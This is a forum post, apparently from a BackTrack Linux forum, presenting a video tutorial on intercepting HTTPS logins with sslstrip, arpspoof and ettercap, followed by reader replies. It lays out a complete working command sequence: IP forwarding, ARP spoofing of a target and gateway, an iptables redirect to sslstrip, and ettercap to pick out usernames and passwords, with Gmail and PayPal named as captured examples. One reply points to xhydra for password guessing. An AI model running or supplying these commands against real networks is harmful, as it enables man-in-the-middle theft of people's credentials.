[Video] How to: Snifff SSL / HTTPS (sslstrip)

Links
Watch video on-line: http://g0tmi1k.blip.tv/file/2345515
Download video: http://www.mediafire.com/?nbx8odfabbgf21j

What is this?
This video shows that with SSL encryption, it isn't secure. Proof of this is seen by showing a web based email (Google Mail) & online bank (PayPal) password.


How does this work?
> Performing a 'Man In The Middle' attack therefore all the traffic flows through the attacker.
> Picks out HTTP traffic from port 80 and then packet redirection / forwarding onto a different port.
> SSLStrip is then listening on that port and removes the SSL connection before passing it back to the user.
> ettercap then picks out the username & password.


What do I need?
> sslstrip
> arpspoof
> ettercap
*all in BackTrack 4 Pre Final*


Network Setup:
Targets IP: 192.168.1.6
Gateway : 192.168.1.1


Software
Name: sslstrip
Version: 0.2
Home Page: http://www.thoughtcrime.org/software...rip/index.html
Download Link: http://www.thoughtcrime.org/software...rip-0.2.tar.gz

Name: arpspoof (DSniff)
Version: 2.3
Home Page: http://www.monkey.org/~dugsong/dsniff/
Download Link: http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz

Name: ettercap
Version: 0.7.3
Home Page: http://ettercap.sourceforge.net
Download Link: http://prdownloads.sourceforge.net/e...ar.gz?download


Commands:

Code:

---

kate /etc/etter.conf
>*uncomment redir_command_off in the iptables, linux section*
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
ettercap -T -q -i wlan0

sslstrip -a -k -f
ettercap -T -q -i wlan0

---

Notes:
You could save the packets instead, and then look through it later, in case ettercap doesn't pick up the information you need!

Song: 16 Bit Lolitas - Nobody Seems To Care
Video length: 03:55
Capture length: 4:41

Blog Post:http://g0tmi1k.blogspot.com/2009/07/...ssl-https.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1659-%5Bvideo%5D-how-snifff-ssl-https-sslstrip.html

Thanks for posting the tutorial to the new forums, it's good to see you here. :)

EDIT: Answer to the below: You're welcome, g0tmi1k!
I deleted the warning since it is fixed now, there's no reason to leave it here.

Quote:

---

Originally Posted by Snayler

Thanks for posting the tutorial to the new forums, it's good to see you here. :)
The two following links are pointing to different places than what they announce. In your blog they're also like this.

---

Hello!
Thanks for the warm welcome! (=
and another thanks for pointing that out!
*updates and checks all posts*

Great Video thanks for sharing i marked this on my favorites..Great song..Whats the group of the song

Quote:

---

Originally Posted by Big_Mike

Great Video thanks for sharing i marked this on my favorites..Great song..Whats the group of the song

---

Your welcome!
The song info is posted in the video & the post... but here it is again.
Song: 16 Bit Lolitas - Nobody Seems To Care

Hi gotm1lk,

what a great video. Well done. Could you come out with more tutorials? or you could point me to some other resources as well.

Cheers~~

Quote:

---

Originally Posted by khianhui

Hi gotm1lk,

what a great video. Well done. Could you come out with more tutorials? or you could point me to some other resources as well.

Cheers~~

---

Thanks for the thanks!
There is my blog for the ones which I have done...*also have added most of them here*. I'm trying to do, at least a one video once a month.
For other resources , keep your eye here...if it was anything like the old forum, there will be alot of good info posted. backtrack-linux just needs time, as its new! (=

Theres also xhydra if you dont like the CLI helps with trial and error type of attacks

I cant see the reason for using both ettercap AND arp-spoof. You can do the arp-poisoning using ettercap, no need for arp-soof.

(If I am mistaken, please do correct me)

That was the great posting.

I have doubt

I dont find wlan0 in my lan.

Can i interchange, it will eth0

will it work???